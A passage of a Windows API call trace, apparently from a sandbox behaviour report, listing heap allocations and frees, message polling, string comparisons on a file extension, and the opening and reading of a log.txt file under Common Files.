(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0177.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0177.669] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0177.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0177.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0177.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0177.670] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0177.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda68 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0177.671] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0177.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0177.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.672] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.672] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.673] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.673] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.674] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0177.674] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.674] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.675] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0177.675] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0177.675] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x160) returned 0x8fff00 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.676] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.676] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0177.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0177.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0177.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0177.677] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0177.677] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.678] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.678] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0177.678] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.678] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.678] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0177.679] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0177.679] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.679] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0177.679] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, 